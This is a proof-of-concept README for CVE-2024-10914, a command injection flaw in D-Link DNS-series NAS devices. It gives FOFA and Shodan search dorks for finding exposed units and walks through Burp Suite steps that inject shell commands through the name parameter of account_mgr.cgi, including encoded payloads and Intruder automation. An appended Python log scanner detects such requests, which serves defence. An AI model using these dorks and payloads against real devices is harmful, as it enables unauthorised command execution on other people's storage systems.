CVE-2024-10914 PoC — D-Link DNS-320/DNS-320LW/DNS-325/DNS-340L account_mgr.cgi cgi_user_add os command injection

Associated Vulnerability
Title: D-Link DNS-320/DNS-320LW/DNS-325/DNS-340L account_mgr.cgi cgi_user_add os command injection (CVE-2024-10914)
Description: A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used.
Description
CVE-2024-10914: manual testing with Burp Suite
Readme
# CVE-2024-10914 Command Injection Vulnerability Testing for D-Link NAS (manual testing with Burp Suite)

---

## Dork for Finding Vulnerable Devices

Use the following search dorks to find potentially vulnerable D-Link NAS devices:

```plaintext
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd"
```

These search strings help identify devices running the D-Link DNS ShareCenter web application on the specific Lighttpd build that is affected by the vulnerability.

---

This guide provides step-by-step instructions on how to manually test for the command injection vulnerability (CVE-2024-10914) in the `name` parameter of a D-Link NAS using Burp Suite. The target URL is written as `http://Target` throughout.

## Prerequisites
- Burp Suite
- A web browser configured to use Burp Suite as a proxy (typically set to `127.0.0.1:8080`)

---

## Step 1: Set Up Burp Suite
1. **Launch Burp Suite**: Start Burp Suite on your machine.
2. **Configure Proxy**: Ensure your browser is configured to use Burp Suite as its proxy by setting the browser's proxy settings to `127.0.0.1` on port `8080`.

---

## Step 2: Intercept the Request
1. **Navigate to the Target**: In your browser, go to `http://Target`.
2. **Enable Intercept**: In Burp Suite, enable the intercept feature to capture the outgoing request.

---

## Step 3: Modify the Request
1. **Locate the Vulnerable Parameter**: In the intercepted request, find the `name` parameter in the URL. It should appear as:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
   ```

2. **Inject a Test Command**: Modify the `name` parameter to include a test command like `echo "test"`:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
   ```

3. **Send the Modified Request**: Forward the modified request to the server.

---

## Step 4: Analyze the Response
1. **Check the Response**: Look for the output of the injected command in the response. For example, if the server executed `echo "test"`, you should see:

   ```plaintext
   test
   ```

---

## Step 5: Exploit the Vulnerability
1. **Inject a Malicious Command**: If the test is successful, attempt more sophisticated commands, such as:

   ```plaintext
   /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
   ```

2. **Send the Exploit Request**: Forward this request to the server.
3. **Analyze the Response**: Check if the output of the command (e.g., user ID info) is present in the response.

---

## Step 6: Automate with Burp Suite Extensions (Optional)
1. **Use Intruder**: Automate testing with Burp Suite's Intruder tool.
   - Right-click the request and select **Send to Intruder**.
   - Set the `name` parameter as the payload position.
   - Use a list of commands as payloads for testing.

2. **Example Payloads**:
   ```plaintext
   echo "test"
   id
   uname -a
   ls /etc
   ```

3. **Start Intruder**: Run the Intruder attack to test multiple payloads automatically.

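For the defensive side of the procedure above, the following added example (not part of the original README) scans lighttpd-style access log lines for `cgi_user_add` requests whose `name` parameter carries shell metacharacters, which is the pattern every request in Steps 3 to 6 produces. The log lines are constructed samples; the log format regex assumes the Common Log Format that lighttpd writes by default.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoint and command named in the advisory for CVE-2024-10914.
VULN_PATH = "/cgi-bin/account_mgr.cgi"
VULN_CMD = "cgi_user_add"
# Shell metacharacters that never belong in a NAS account name.
SHELL_META = re.compile(r"[;'`|$\n]")

# Common Log Format (assumed lighttpd default):
# host ident user [time] "METHOD uri HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_query(query):
    """Split a query string on '&' only, so a literal ';' inside a value is kept."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def inspect_line(line):
    """Return a finding dict for a suspicious cgi_user_add request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if parts.path != VULN_PATH:
        return None
    params = parse_query(parts.query)
    if VULN_CMD not in params.get("cmd", []):
        return None
    for raw in params.get("name", []):
        decoded = unquote_plus(raw)  # second pass catches double-encoded values
        if SHELL_META.search(decoded):
            return {"src": m.group("host"), "time": m.group("time"),
                    "status": m.group("status"), "name": decoded}
    return None


def scan(log_text):
    """Run inspect_line over every line and collect the findings."""
    return [f for f in (inspect_line(l) for l in log_text.splitlines()) if f]


# Constructed sample log (not real traffic): a benign user creation,
# the echo test request from Step 3 of the README, and an unrelated command.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Nov/2024:12:00:01 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=alice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2024:12:00:02 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27 HTTP/1.1" 200 98 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Nov/2024:12:00:03 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_list HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} -> status {f['status']} name={f['name']!r}")
```

A 200 response to a flagged request, as in the second sample line, is the case worth treating as a likely successful injection rather than a blocked probe.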
---